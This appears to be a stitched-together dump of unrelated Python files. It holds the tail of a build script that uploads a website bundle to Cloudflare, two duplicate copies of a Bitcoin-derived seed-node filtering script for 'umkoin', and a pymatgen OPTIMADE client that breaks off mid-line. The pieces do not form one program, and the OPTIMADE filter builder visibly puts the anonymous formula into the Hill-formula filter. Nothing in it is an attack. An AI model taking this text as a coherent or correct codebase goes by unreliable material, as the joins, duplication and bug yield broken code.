'src/web/client/not_found.html'...") with open("src/web/client/not_found.html","rb") as rf: o+=_add_data("not_found.html",rf.read().replace(b"{{ANALYTICS}}",cf_a_dt)) util.log("Reading 'src/web/client/shell_install.sh'...") with open("src/web/client/shell_install.sh","rb") as rf: o+=_add_data("shell_install.sh",rf.read()) if (os.getenv("GITHUB_ACTIONS",None) is not None): with open("web-bundle.dt","wb") as f: f.write(o) else: util.log("Generating Local Website...") i=0 while (i<len(o)): l=o[i] sz=o[i+1]|(o[i+2]<<8)|(o[i+3]<<16) i+=4 fp="build/web/"+o[i:i+l].decode("ascii","ignore") os.makedirs(fp[:fp.rindex("/")],exist_ok=True) i+=l util.log(f" Writing '{fp}' ({sz} bytes)...") with open(fp,"wb") as f: f.write(o[i:i+sz]) i+=sz if (__name__=="__main__"): import requests if ("--server" in sys.argv): with open("src/web/server/main.js","rb") as f: util.log("Uploading Server Code...") requests.put(f"https://api.cloudflare.com/client/v4/accounts/{sys.argv[-3]}/workers/scripts/{sys.argv[-2]}",data=f.read(),headers={"Authorization":"Bearer "+sys.argv[-1],"Content-Type":"application/javascript"}) else: url=f"https://api.cloudflare.com/client/v4/accounts/{sys.argv[-3]}/storage/kv/namespaces/{sys.argv[-2]}/" h={"Authorization":"Bearer "+sys.argv[-1],"Content-Type":"application/json"} util.log("Listing Current KV Keys...") tb_r=requests.get(url+"values/__table",headers=h,stream=True).raw tb_r.decode_content=True l=[] n_tb=[] for k in tb_r.read().split(b"\x00"): if (k[:5]==b"/apt/" or k[:5]==b"/bin/"): n_tb.append(k) else: util.log(f" Found Key '{k.decode('ascii','ignore')}' ") l.append(hashlib.sha256(k).hexdigest()) util.log("Clearing KV Storage...") requests.delete(url+"bulk",headers=h,data="["+",".join([f"\"{e}\"" for e in l])+"]") util.log("Generating Request...") with open("web-bundle.dt","rb") as f: dt=f.read() i=0 o=[] while (i<len(dt)): l=dt[i] sz=dt[i+1]|(dt[i+2]<<8)|(dt[i+3]<<16) i+=4 fp=dt[i:i+l] i+=l fp_h=hashlib.sha256(fp).hexdigest() util.log(f" Encoding File '{fp.decode('ascii','ignore')}' ({sz} bytes) -> '{fp_h}'...") n_tb.append(fp) o.append({"key":fp_h,"value":util.encode(dt[i:i+sz]),"base64":True}) i+=sz o.append({"key":"__table","value":util.encode(b"\x00".join(n_tb)),"base64":True}) util.log("Uploading Data...") requests.put(url+"bulk",headers=h,data=json.dumps(o))
#!/usr/bin/env python3 # Copyright (c) 2013-2020 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. # # Generate seeds.txt from Pieter's DNS seeder # import re import sys import dns.resolver import collections from typing import List, Dict, Union NSEEDS=512 MAX_SEEDS_PER_ASN = { 'ipv4': 2, 'ipv6': 10, } MIN_BLOCKS = 153500 PATTERN_IPV4 = re.compile(r"^((\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})):(\d+)$") PATTERN_IPV6 = re.compile(r"^\[([0-9a-z:]+)\]:(\d+)$") PATTERN_ONION = re.compile(r"^([a-z2-7]{56}\.onion):(\d+)$") PATTERN_AGENT = re.compile( r"^/Satoshi:(" r"0.14.(0|1|2|3|99)|" r"0.15.(0|1|2|99)|" r"0.16.(0|1|2|3|99)|" r"0.17.(0|0.1|1|2|99)|" r"0.18.(0|1|99)|" r"0.19.(0|1|2|99)|" r"0.20.(0|1|2|99)|" r"0.21.(0|1|2|99)|" r"22.(0|99)|" r"23.99" r")") def parseline(line: str) -> Union[dict, None]: """ Parses a line from `seeds_main.txt` into a dictionary of details for that line. or `None`, if the line could not be parsed. """ sline = line.split() if len(sline) < 11: # line too short to be valid, skip it. return None m = PATTERN_IPV4.match(sline[0]) sortkey = None ip = None if m is None: m = PATTERN_IPV6.match(sline[0]) if m is None: m = PATTERN_ONION.match(sline[0]) if m is None: return None else: net = 'onion' ipstr = sortkey = m.group(1) port = int(m.group(2)) else: net = 'ipv6' if m.group(1) in ['::']: # Not interested in localhost return None ipstr = m.group(1) sortkey = ipstr # XXX parse IPv6 into number, could use name_to_ipv6 from generate-seeds port = int(m.group(2)) else: # Do IPv4 sanity check ip = 0 for i in range(0,4): if int(m.group(i+2)) < 0 or int(m.group(i+2)) > 255: return None ip = ip + (int(m.group(i+2)) << (8*(3-i))) if ip == 0: return None net = 'ipv4' sortkey = ip ipstr = m.group(1) port = int(m.group(6)) # Skip bad results. if sline[1] == 0: return None # Extract uptime %. uptime30 = float(sline[7][:-1]) # Extract Unix timestamp of last success. lastsuccess = int(sline[2]) # Extract protocol version. version = int(sline[10]) # Extract user agent. agent = sline[11][1:-1] # Extract service flags. service = int(sline[9], 16) # Extract blocks. blocks = int(sline[8]) # Construct result. return { 'net': net, 'ip': ipstr, 'port': port, 'ipnum': ip, 'uptime': uptime30, 'lastsuccess': lastsuccess, 'version': version, 'agent': agent, 'service': service, 'blocks': blocks, 'sortkey': sortkey, } def dedup(ips: List[Dict]) -> List[Dict]: """ Remove duplicates from `ips` where multiple ips share address and port. """ d = {} for ip in ips: d[ip['ip'],ip['port']] = ip return list(d.values()) def filtermultiport(ips: List[Dict]) -> List[Dict]: """ Filter out hosts with more nodes per IP""" hist = collections.defaultdict(list) for ip in ips: hist[ip['sortkey']].append(ip) return [value[0] for (key,value) in list(hist.items()) if len(value)==1] def lookup_asn(net: str, ip: str) -> Union[int, None]: """ Look up the asn for an `ip` address by querying cymru.com on network `net` (e.g. ipv4 or ipv6). Returns in integer ASN or None if it could not be found. """ try: if net == 'ipv4': ipaddr = ip prefix = '.origin' else: # http://www.team-cymru.com/IP-ASN-mapping.html res = str() # 2001:4860:b002:23::68 for nb in ip.split(':')[:4]: # pick the first 4 nibbles for c in nb.zfill(4): # right padded with '0' res += c + '.' # 2001 4860 b002 0023 ipaddr = res.rstrip('.') # 2.0.0.1.4.8.6.0.b.0.0.2.0.0.2.3 prefix = '.origin6' asn = int([x.to_text() for x in dns.resolver.resolve('.'.join( reversed(ipaddr.split('.'))) + prefix + '.asn.cymru.com', 'TXT').response.answer][0].split('\"')[1].split(' ')[0]) return asn except Exception as e: sys.stderr.write(f'ERR: Could not resolve ASN for "{ip}": {e}\n') return None # Based on Greg Maxwell's seed_filter.py def filterbyasn(ips: List[Dict], max_per_asn: Dict, max_per_net: int) -> List[Dict]: """ Prunes `ips` by (a) trimming ips to have at most `max_per_net` ips from each net (e.g. ipv4, ipv6); and (b) trimming ips to have at most `max_per_asn` ips from each asn in each net. """ # Sift out ips by type ips_ipv46 = [ip for ip in ips if ip['net'] in ['ipv4', 'ipv6']] ips_onion = [ip for ip in ips if ip['net'] == 'onion'] # Filter IPv46 by ASN, and limit to max_per_net per network result = [] net_count: Dict[str, int] = collections.defaultdict(int) asn_count: Dict[int, int] = collections.defaultdict(int) for i, ip in enumerate(ips_ipv46): if i % 10 == 0: # give progress update print(f"{i:6d}/{len(ips_ipv46)} [{100*i/len(ips_ipv46):04.1f}%]\r", file=sys.stderr, end='', flush=True) if net_count[ip['net']] == max_per_net: # do not add this ip as we already too many # ips from this network continue asn = lookup_asn(ip['net'], ip['ip']) if asn is None or asn_count[asn] == max_per_asn[ip['net']]: # do not add this ip as we already have too many # ips from this ASN on this network continue asn_count[asn] += 1 net_count[ip['net']] += 1 result.append(ip) # Add back Onions (up to max_per_net) result.extend(ips_onion[0:max_per_net]) return result def ip_stats(ips: List[Dict]) -> str: """ Format and return pretty string from `ips`. """ hist: Dict[str, int] = collections.defaultdict(int) for ip in ips: if ip is not None: hist[ip['net']] += 1 return f"{hist["ipv4"]:6d} {hist["ipv6"]:6d} {hist["onion"]:6d}" def main(): lines = sys.stdin.readlines() ips = [parseline(line) for line in lines] print('\x1b[7m IPv4 IPv6 Onion Pass \x1b[0m', file=sys.stderr) print(f'{ip_stats(ips):s} Initial', file=sys.stderr) # Skip entries with invalid address. ips = [ip for ip in ips if ip is not None] print(f'{ip_stats(ips):s} Skip entries with invalid address', file=sys.stderr) # Skip duplicates (in case multiple seeds files were concatenated) ips = dedup(ips) print(f'{ip_stats(ips):s} After removing duplicates', file=sys.stderr) # Enforce minimal number of blocks. ips = [ip for ip in ips if ip['blocks'] >= MIN_BLOCKS] print(f'{ip_stats(ips):s} Enforce minimal number of blocks', file=sys.stderr) # Require service bit 1. ips = [ip for ip in ips if (ip['service'] & 1) == 1] print(f'{ip_stats(ips):s} Require service bit 1', file=sys.stderr) # Require at least 50% 30-day uptime for clearnet, 10% for onion. req_uptime = { 'ipv4': 50, 'ipv6': 50, 'onion': 10, } ips = [ip for ip in ips if ip['uptime'] > req_uptime[ip['net']]] print(f'{ip_stats(ips):s} Require minimum uptime', file=sys.stderr) # Require a known and recent user agent. ips = [ip for ip in ips if PATTERN_AGENT.match(ip['agent'])] print(f'{ip_stats(ips):s} Require a known and recent user agent', file=sys.stderr) # Sort by availability (and use last success as tie breaker) ips.sort(key=lambda x: (x['uptime'], x['lastsuccess'], x['ip']), reverse=True) # Filter out hosts with multiple umkoin ports, these are likely abusive ips = filtermultiport(ips) print(f'{ip_stats(ips):s} Filter out hosts with multiple umkoin ports', file=sys.stderr) # Look up ASNs and limit results, both per ASN and globally. ips = filterbyasn(ips, MAX_SEEDS_PER_ASN, NSEEDS) print(f'{ip_stats(ips):s} Look up ASNs and limit results per ASN and per net', file=sys.stderr) # Sort the results by IP address (for deterministic output). ips.sort(key=lambda x: (x['net'], x['sortkey'])) for ip in ips: if ip['net'] == 'ipv6': print('[%s]:%i' % (ip['ip'], ip['port'])) else: print('%s:%i' % (ip['ip'], ip['port'])) if __name__ == '__main__': main()
#!/usr/bin/env python3 # Copyright (c) 2013-2020 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. # # Generate seeds.txt from Pieter's DNS seeder # import re import sys import dns.resolver import collections from typing import List, Dict, Union NSEEDS=512 MAX_SEEDS_PER_ASN = { 'ipv4': 2, 'ipv6': 10, } MIN_BLOCKS = 153500 PATTERN_IPV4 = re.compile(r"^((\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})):(\d+)$") PATTERN_IPV6 = re.compile(r"^\[([0-9a-z:]+)\]:(\d+)$") PATTERN_ONION = re.compile(r"^([a-z2-7]{56}\.onion):(\d+)$") PATTERN_AGENT = re.compile( r"^/Satoshi:(" r"0.14.(0|1|2|3|99)|" r"0.15.(0|1|2|99)|" r"0.16.(0|1|2|3|99)|" r"0.17.(0|0.1|1|2|99)|" r"0.18.(0|1|99)|" r"0.19.(0|1|2|99)|" r"0.20.(0|1|2|99)|" r"0.21.(0|1|2|99)|" r"22.(0|99)|" r"23.99" r")") def parseline(line: str) -> Union[dict, None]: """ Parses a line from `seeds_main.txt` into a dictionary of details for that line. or `None`, if the line could not be parsed. """ sline = line.split() if len(sline) < 11: # line too short to be valid, skip it. return None m = PATTERN_IPV4.match(sline[0]) sortkey = None ip = None if m is None: m = PATTERN_IPV6.match(sline[0]) if m is None: m = PATTERN_ONION.match(sline[0]) if m is None: return None else: net = 'onion' ipstr = sortkey = m.group(1) port = int(m.group(2)) else: net = 'ipv6' if m.group(1) in ['::']: # Not interested in localhost return None ipstr = m.group(1) sortkey = ipstr # XXX parse IPv6 into number, could use name_to_ipv6 from generate-seeds port = int(m.group(2)) else: # Do IPv4 sanity check ip = 0 for i in range(0,4): if int(m.group(i+2)) < 0 or int(m.group(i+2)) > 255: return None ip = ip + (int(m.group(i+2)) << (8*(3-i))) if ip == 0: return None net = 'ipv4' sortkey = ip ipstr = m.group(1) port = int(m.group(6)) # Skip bad results. if sline[1] == 0: return None # Extract uptime %. uptime30 = float(sline[7][:-1]) # Extract Unix timestamp of last success. lastsuccess = int(sline[2]) # Extract protocol version. version = int(sline[10]) # Extract user agent. agent = sline[11][1:-1] # Extract service flags. service = int(sline[9], 16) # Extract blocks. blocks = int(sline[8]) # Construct result. return { 'net': net, 'ip': ipstr, 'port': port, 'ipnum': ip, 'uptime': uptime30, 'lastsuccess': lastsuccess, 'version': version, 'agent': agent, 'service': service, 'blocks': blocks, 'sortkey': sortkey, } def dedup(ips: List[Dict]) -> List[Dict]: """ Remove duplicates from `ips` where multiple ips share address and port. """ d = {} for ip in ips: d[ip['ip'],ip['port']] = ip return list(d.values()) def filtermultiport(ips: List[Dict]) -> List[Dict]: """ Filter out hosts with more nodes per IP""" hist = collections.defaultdict(list) for ip in ips: hist[ip['sortkey']].append(ip) return [value[0] for (key,value) in list(hist.items()) if len(value)==1] def lookup_asn(net: str, ip: str) -> Union[int, None]: """ Look up the asn for an `ip` address by querying cymru.com on network `net` (e.g. ipv4 or ipv6). Returns in integer ASN or None if it could not be found. """ try: if net == 'ipv4': ipaddr = ip prefix = '.origin' else: # http://www.team-cymru.com/IP-ASN-mapping.html res = str() # 2001:4860:b002:23::68 for nb in ip.split(':')[:4]: # pick the first 4 nibbles for c in nb.zfill(4): # right padded with '0' res += c + '.' # 2001 4860 b002 0023 ipaddr = res.rstrip('.') # 2.0.0.1.4.8.6.0.b.0.0.2.0.0.2.3 prefix = '.origin6' asn = int([x.to_text() for x in dns.resolver.resolve('.'.join( reversed(ipaddr.split('.'))) + prefix + '.asn.cymru.com', 'TXT').response.answer][0].split('\"')[1].split(' ')[0]) return asn except Exception as e: sys.stderr.write(f'ERR: Could not resolve ASN for "{ip}": {e}\n') return None # Based on Greg Maxwell's seed_filter.py def filterbyasn(ips: List[Dict], max_per_asn: Dict, max_per_net: int) -> List[Dict]: """ Prunes `ips` by (a) trimming ips to have at most `max_per_net` ips from each net (e.g. ipv4, ipv6); and (b) trimming ips to have at most `max_per_asn` ips from each asn in each net. """ # Sift out ips by type ips_ipv46 = [ip for ip in ips if ip['net'] in ['ipv4', 'ipv6']] ips_onion = [ip for ip in ips if ip['net'] == 'onion'] # Filter IPv46 by ASN, and limit to max_per_net per network result = [] net_count: Dict[str, int] = collections.defaultdict(int) asn_count: Dict[int, int] = collections.defaultdict(int) for i, ip in enumerate(ips_ipv46): if i % 10 == 0: # give progress update print(f"{i:6d}/{len(ips_ipv46)} [{100*i/len(ips_ipv46):04.1f}%]\r", file=sys.stderr, end='', flush=True) if net_count[ip['net']] == max_per_net: # do not add this ip as we already too many # ips from this network continue asn = lookup_asn(ip['net'], ip['ip']) if asn is None or asn_count[asn] == max_per_asn[ip['net']]: # do not add this ip as we already have too many # ips from this ASN on this network continue asn_count[asn] += 1 net_count[ip['net']] += 1 result.append(ip) # Add back Onions (up to max_per_net) result.extend(ips_onion[0:max_per_net]) return result def ip_stats(ips: List[Dict]) -> str: """ Format and return pretty string from `ips`. """ hist: Dict[str, int] = collections.defaultdict(int) for ip in ips: if ip is not None: hist[ip['net']] += 1 return f"{hist['ipv4']:6d} {hist['ipv6']:6d} {hist['onion']:6d}" def main(): lines = sys.stdin.readlines() ips = [parseline(line) for line in lines] print('\x1b[7m IPv4 IPv6 Onion Pass \x1b[0m', file=sys.stderr) print(f'{ip_stats(ips):s} Initial', file=sys.stderr) # Skip entries with invalid address. ips = [ip for ip in ips if ip is not None] print(f'{ip_stats(ips):s} Skip entries with invalid address', file=sys.stderr) # Skip duplicates (in case multiple seeds files were concatenated) ips = dedup(ips) print(f'{ip_stats(ips):s} After removing duplicates', file=sys.stderr) # Enforce minimal number of blocks. ips = [ip for ip in ips if ip['blocks'] >= MIN_BLOCKS] print(f'{ip_stats(ips):s} Enforce minimal number of blocks', file=sys.stderr) # Require service bit 1. ips = [ip for ip in ips if (ip['service'] & 1) == 1] print(f'{ip_stats(ips):s} Require service bit 1', file=sys.stderr) # Require at least 50% 30-day uptime for clearnet, 10% for onion. req_uptime = { 'ipv4': 50, 'ipv6': 50, 'onion': 10, } ips = [ip for ip in ips if ip['uptime'] > req_uptime[ip['net']]] print(f'{ip_stats(ips):s} Require minimum uptime', file=sys.stderr) # Require a known and recent user agent. ips = [ip for ip in ips if PATTERN_AGENT.match(ip['agent'])] print(f'{ip_stats(ips):s} Require a known and recent user agent', file=sys.stderr) # Sort by availability (and use last success as tie breaker) ips.sort(key=lambda x: (x['uptime'], x['lastsuccess'], x['ip']), reverse=True) # Filter out hosts with multiple umkoin ports, these are likely abusive ips = filtermultiport(ips) print(f'{ip_stats(ips):s} Filter out hosts with multiple umkoin ports', file=sys.stderr) # Look up ASNs and limit results, both per ASN and globally. ips = filterbyasn(ips, MAX_SEEDS_PER_ASN, NSEEDS) print(f'{ip_stats(ips):s} Look up ASNs and limit results per ASN and per net', file=sys.stderr) # Sort the results by IP address (for deterministic output). ips.sort(key=lambda x: (x['net'], x['sortkey'])) for ip in ips: if ip['net'] == 'ipv6': print('[%s]:%i' % (ip['ip'], ip['port'])) else: print('%s:%i' % (ip['ip'], ip['port'])) if __name__ == '__main__': main()
""" Optimade support. """ import logging import sys from collections import namedtuple from os.path import join from typing import Dict, Union, List, Optional from urllib.parse import urlparse import requests #from retrying import retry from pymatgen.core.periodic_table import DummySpecies from pymatgen.core.structure import Structure from pymatgen.util.provenance import StructureNL from pymatgen.util.sequence import PBar # TODO: importing optimade-python-tool's data structures will make more sense Provider = namedtuple("Provider", ["name", "base_url", "description", "homepage", "prefix"]) _logger = logging.getLogger(__name__) _handler = logging.StreamHandler(sys.stdout) _logger.addHandler(_handler) _logger.setLevel(logging.WARNING) class OptimadeRester: """ Class to call OPTIMADE-compliant APIs, see optimade.org This class is ready to use but considered in-development and subject to change until the OPTIMADE paper is published. """ # regenerate on-demand from official providers.json using OptimadeRester.refresh_aliases() # these aliases are provided as a convenient shortcut for users of the OptimadeRester class aliases = { "aflow": "http://aflow.org/API/optimade/", "cod": "https://www.crystallography.net/cod/optimade", "mcloud.2dstructures": "https://aiida.materialscloud.org/2dstructures/optimade", "mcloud.2dtopo": "https://aiida.materialscloud.org/2dtopo/optimade", "mcloud.curated-cofs": "https://aiida.materialscloud.org/curated-cofs/optimade", "mcloud.li-ion-conductors": "https://aiida.materialscloud.org/li-ion-conductors/optimade", "mcloud.optimade-sample": "https://aiida.materialscloud.org/optimade-sample/optimade", "mcloud.pyrene-mofs": "https://aiida.materialscloud.org/pyrene-mofs/optimade", "mcloud.scdm": "https://aiida.materialscloud.org/autowannier/optimade", "mcloud.sssp": "https://aiida.materialscloud.org/sssplibrary/optimade", "mcloud.stoceriaitf": "https://aiida.materialscloud.org/stoceriaitf/optimade", "mcloud.tc-applicability": "https://aiida.materialscloud.org/tc-applicability/optimade", "mcloud.threedd": "https://aiida.materialscloud.org/3dd/optimade", "mp": "https://optimade.materialsproject.org", "mpds": "https://api.mpds.io", "nmd": "https://nomad-lab.eu/prod/rae/optimade/", "odbx": "https://optimade.odbx.science", "omdb.omdb_production": "http://optimade.openmaterialsdb.se", "oqmd": "http://oqmd.org/optimade/", "tcod": "https://www.crystallography.net/tcod/optimade", } def __init__(self, aliases_or_resource_urls: Optional[Union[str, List[str]]] = None, timeout=5): """ OPTIMADE is an effort to provide a standardized interface to retrieve information from many different materials science databases. This is a client to retrieve structures from OPTIMADE v1 compliant endpoints. It does not yet support all features of the OPTIMADE v1 specification but is intended as a way to quickly search an endpoint in a way familiar to users of pymatgen without needing to know the full OPTIMADE specification. For advanced usage, please see the OPTIMADE documentation at optimade.org and consider calling the APIs directly. For convenience, known OPTIMADE endpoints have been given aliases in pymatgen to save typing the full URL. The current list of aliases is: aflow, cod, mcloud.sssp, mcloud.2dstructures, mcloud.2dtopo, mcloud.tc-applicability, mcloud.threedd, mcloud.scdm, mcloud.curated-cofs, mcloud.optimade-sample, mcloud.stoceriaitf, mcloud.pyrene-mofs, mcloud.li-ion-conductors, mp, odbx, omdb.omdb_production, oqmd, tcod To refresh this list of aliases, generated from the current list of OPTIMADE providers at optimade.org, call the refresh_aliases() method. Args: aliases_or_resource_urls: the alias or structure resource URL or a list of aliases or resource URLs, if providing the resource URL directly it should not be an index, this interface can only currently access the "v1/structures" information from the specified resource URL timeout: number of seconds before an attempted request is abandoned, a good timeout is useful when querying many providers, some of which may be offline """ # TODO: maybe we should use the nice pydantic models from optimade-python-tools # for response validation, and use the Lark parser for filter validation self.session = requests.Session() self._timeout = timeout # seconds if isinstance(aliases_or_resource_urls, str): aliases_or_resource_urls = [aliases_or_resource_urls] # this stores a dictionary with keys provider id (in the same format as the aliases) # and values as the corresponding URL self.resources = {} if not aliases_or_resource_urls: aliases_or_resource_urls = list(self.aliases.keys()) _logger.warning( "Connecting to all known OPTIMADE providers, this will be slow. Please connect to only the " f"OPTIMADE providers you want to query. Choose from: {", ".join(self.aliases.keys())}" ) for alias_or_resource_url in aliases_or_resource_urls: if alias_or_resource_url in self.aliases: self.resources[alias_or_resource_url] = self.aliases[alias_or_resource_url] elif self._validate_provider(alias_or_resource_url): # TODO: unclear what the key should be here, the "prefix" is for the root provider, # may need to walk back to the index for the given provider to find the correct identifier self.resources[alias_or_resource_url] = alias_or_resource_url else: _logger.error(f"The following is not a known alias or a valid url: {alias_or_resource_url}") self._providers = {url: self._validate_provider(provider_url=url) for url in self.resources.values()} def __repr__(self): return f"OptimadeRester connected to: {", ".join(self.resources.values())}" def __str__(self): return self.describe() def describe(self): """ Provides human-readable information about the resources being searched by the OptimadeRester. """ provider_text = "\n".join(map(str, (provider for provider in self._providers.values() if provider))) description = f"OptimadeRester connected to:\n{provider_text}" return description #@retry(stop_max_attempt_number=3, wait_random_min=1000, wait_random_max=2000) def _get_json(self, url): """ Retrieves JSON, will attempt to (politely) try again on failure subject to a random delay and a maximum number of attempts. """ return self.session.get(url, timeout=self._timeout).json() @staticmethod def _build_filter( elements=None, nelements=None, nsites=None, chemical_formula_anonymous=None, chemical_formula_hill=None ): """ Convenience method to build an OPTIMADE filter. """ filters = [] if elements: if isinstance(elements, str): elements = [elements] elements_str = ", ".join([f'"{el}"' for el in elements]) filters.append(f"(elements HAS ALL {elements_str})") if nsites: if isinstance(nsites, (list, tuple)): filters.append(f"(nsites>={min(nsites)} AND nsites<={max(nsites)})") else: filters.append(f"(nsites={int(nsites)})") if nelements: if isinstance(nelements, (list, tuple)): filters.append(f"(nelements>={min(nelements)} AND nelements<={max(nelements)})") else: filters.append(f"(nelements={int(nelements)})") if chemical_formula_anonymous: filters.append(f'(chemical_formula_anonymous="{chemical_formula_anonymous}")') if chemical_formula_hill: filters.append(f'(chemical_formula_hill="{chemical_formula_anonymous}")') return " AND ".join(filters) def get_structures( self, elements=None, nelements=None, nsites=None, chemical_formula_anonymous=None, chemical_formula_hill=None, ) -> Dict[str, Dict[str, Structure]]: """ Retrieve Structures from OPTIMADE providers. Not all functionality of OPTIMADE is currently exposed in this convenience method. To use a custom filter, call get_structures_with_filter(). Args: elements: List of elements nelements: Number of elements, e.g. 4 or [2, 5] for the range >=2 and <=5 nsites: Number of sites, e.g. 4 or [2, 5] for the range >=2 and <=5 chemical_formula_anonymous: Anonymous chemical formula chemical_formula_hill: Chemical formula following Hill convention Returns: Dict of (Dict Structures keyed by that database's id system) keyed by provider """ optimade_filter = self._build_filter( elements=elements, nelements=nelements, nsites=nsites, chemical_formula_anonymous=chemical_formula_anonymous, chemical_formula_hill=chemical_formula_hill, ) return self.get_structures_with_filter(optimade_filter) def get_snls( self, elements=None, nelements=None, nsites=None, chemical_formula_anonymous=None, chemical_formula_hill=None, ) -> Dict[str, Dict[str, StructureNL]]: """ Retrieve StructureNL from OPTIMADE providers. A StructureNL is an object provided by pymatgen which combines Structure with associated metadata, such as the URL is was downloaded from and any additional namespaced data. Not all functionality of OPTIMADE is currently exposed in this convenience method. To use a custom filter, call get_structures_with_filter(). Args: elements: List of elements nelements: Number of elements, e.g. 4 or [2, 5] for the range >=2 and <=5 nsites: Number of sites, e.g. 4 or [2, 5] for the range >=2 and <=5 chemical_formula_anonymous: Anonymous chemical formula chemical_formula_hill: Chemical formula following Hill convention Returns: Dict of (Dict of StructureNLs keyed by that database's id system) keyed by provider """ optimade_filter = self._build_filter( elements=elements, nelements=nelements, nsites=nsites, chemical_formula_anonymous=chemical_formula_anonymous, chemical_formula_hill=chemical_formula_hill, ) return self.get_snls_with_filter(optimade_filter) def get_structures_with_filter(self, optimade_filter: str) -> Dict[str, Dict[str, Structure]]: """ Get structures satisfying a given OPTIMADE filter. Args: filter: An OPTIMADE-compliant filter Returns: Dict of Structures keyed by that database's id system """ all_snls = self.get_snls_with_filter(optimade_filter) all_structures = {} for identifier, snls_dict in all_snls.items(): all_structures[identifier] = {k: snl.structure for k, snl in snls_dict.items()} return all_structures def get_snls_with_filter(self, optimade_filter: str) -> Dict[str, Dict[str, StructureNL]]: """ Get structures satisfying a given OPTIMADE filter. Args: filter: An OPTIMADE-compliant filter Returns: Dict of Structures keyed by that database's id system """ all_snls = {} for identifier, resource in self.resources.items(): fields = "response_fields=lattice_vectors,cartesian_site_positions,species,species_at_sites" url = join(resource, f"v1/structures?filter={optimade_filter}&fields={fields}") try: json = self._get_json(url) structures = self._get_snls_from_resource(json, url, identifier) pbar = PBar(total=json["meta"].get("data_returned", 0), desc=identifier, initial=len(structures)) # TODO: check spec for `more_data_available` boolean, may simplify this conditional if ("links" in json) and ("next" in json["links"]) and (json["links"]["next"]): while "next" in json["links"] and json["links"]["next"]: next_link = json["links"]["next"] if isinstance(next_link, dict) and "href" in next_link: next_link = next_link["href"] json = self._get_json(next_link) additional_structures = self._get_snls_from_resource(json, url, identifier) structures.update(additional_structures) pbar.update(len(additional_structures)) if structures: all_snls[identifier] = structures except Exception as exc: # TODO: manually inspect failures to either (a) correct a bug or (b) raise more appropriate error _logger.error( f"Could not retrieve required information from provider {identifier} and url {url}: {exc}" ) return all_snls @staticmethod def _get_snls_from_resource(json, url, identifier) -> Dict[str, StructureNL]: snls = {} exceptions = set() def _sanitize_symbol(symbol): if symbol == "vacancy": symbol = DummySpecies("X_vacancy", oxidation_state=None) elif symbol == "X": symbol = DummySpecies("X", oxidation_state=None) return symbol def _get_comp(sp_dict): return { _sanitize_symbol(symbol): conc for symbol, conc in zip(sp_dict["chemical_symbols"], sp_dict["concentration"]) } for data in json["data"]: # TODO: check the spec! and remove this try/except (are all providers following spec?) # e.g. can check data["type"] == "structures" try: # e.g. COD structure = Structure( lattice=data["attributes"]["lattice_vectors"], species=[_get_comp(d) for d in data["attributes"]["species"]], coords=data["attributes"]["cartesian_site_positions"], coords_are_cartesian=True, ) namespaced_data = {k: v for k, v in data.items() if k.startswith("_")} # TODO: follow `references` to add reference information here snl = StructureNL( structure, authors={}, history=[{"name": identifier, "url": url, "description": {"id": data["id"]}}], data={"_optimade": namespaced_data}, ) snls[data["id"]] = snl # TODO: bare exception, remove... except Exception: try: # e.g. MP (all ordered, no vacancies) structure = Structure( lattice=data["attributes"]["lattice_vectors"], species=data["attributes"]["species_at_sites"], coords=data["attributes"]["cartesian_site_positions"], coords_are_cartesian=True, ) namespaced_data = {k: v for k, v in data["attributes"].items() if k.startswith("_")} # TODO: follow `references` to add reference information here snl = StructureNL( structure, authors={}, history=[{"name": identifier, "url": url, "description": {"id": data["id"]}}], data={"_optimade": namespaced_data}, ) snls[data["id"]] = snl except Exception as exc: if str(exc) not in exceptions: exceptions.add(str(exc)) if exceptions: _logger.error(f'Failed to parse returned data for {url}: {', '.join(exceptions)}') return snls def _validate_provider(self, provider_url) -> Optional[Provider]: """ Checks that a given URL is indeed an OPTIMADE provider, returning None if it is not a provider, or the provider prefix if it is. TODO: careful reading of OPTIMADE specification required TODO: add better exception handling, intentionally permissive currently """ def is_url(url): """ Basic URL validation thanks to https://stackoverflow.com/a/52455972 """ try: result = urlparse(url) return all([result.scheme, result.netloc]) except ValueError: return False if not is_url(provider_url): _logger.warning(f"An invalid url was supplied: {provider_url}") return None try: url = join(provider_url, "v1/info") provider_info_json = self._get_json(url) except Exception as exc: _logger.warning(f"Failed to parse {url} when validating: {exc}") return None try: return Provider( name=provider_info_json["meta"].get("provider", {}).get("name", "Unknown"), base_url=provider_url, description=provider_info_json["meta"].get("provider", {}).get("description", "Unknown"), homepage=provider_info_json["meta"].get("provider", {}).get("homepage"), prefix=provider_info_json["meta"].get("provider", {}).get("prefix", "Unknown"), ) except Exception as exc: _logger.warning(f"Failed to extract required information from {url}: {exc}") return None def _parse_provider(self, provider, provider_url) -> Dict[str, Provider]: """ Used internally to update the list of providers or to check a given URL is valid. It does not raise exceptions but will instead _logger.warning and provide an empty dictionary in the case of invalid data. In future, when the specification is sufficiently well adopted, we might be more strict here. Args: provider: the provider prefix provider_url: An OPTIMADE provider URL Returns: A dictionary of keys (in format of "provider.database") to Provider objects. """ try: url = join(provider_url, "v1/links") provider_link_json = self._get_json(url) except Exception as exc: _logger.error(f"Failed to parse {url} when following links: {exc}") return {} def _parse_provider_link(provider, provider_link_json): """No validation attempted.""" ps = {} try: d = [d for d in provider_link_json["data"] if d["attributes"]["link_type"] == "child"] for link in d: key = f"{provider}.{link["id"]}" if provider != link["id"] else provider if link["attributes"]["base_url"]: ps[key] = Provider( name=link["attributes"]["name"], base_url=link["attributes"]["base_url"], description=link["attributes"]["description"], homepage=link["attributes"].get("homepage"), prefix=link["attributes"].get("prefix"), ) except Exception: # print(f"Failed to parse {provider}: {exc}") # Not all providers parse yet. pass return ps return _parse_provider_link(provider, provider_link_json) def refresh_aliases(self, providers_url="https://providers.optimade.org/providers.json"): """ Updates available OPTIMADE structure resources based on the current list of OPTIMADE providers. """ json = self._get_json(providers_url) providers_from_url = { entry["id"]: entry["attributes"]["base_url"] for entry in json["data"] if entry["attributes"]["base_url"] } structure_providers = {} for provider, provider_link in providers_from_url.items(): structure_providers.update(self._parse_provider(provider, provider_link)) self.aliases = {alias: provider.base_url for alias, provider in structure_providers.items()} # TODO: revisit context manager logic here and in MPRester def __enter__(self): """ Support for "with" context. """ return self def __exit__(self, exc_type, exc_val, 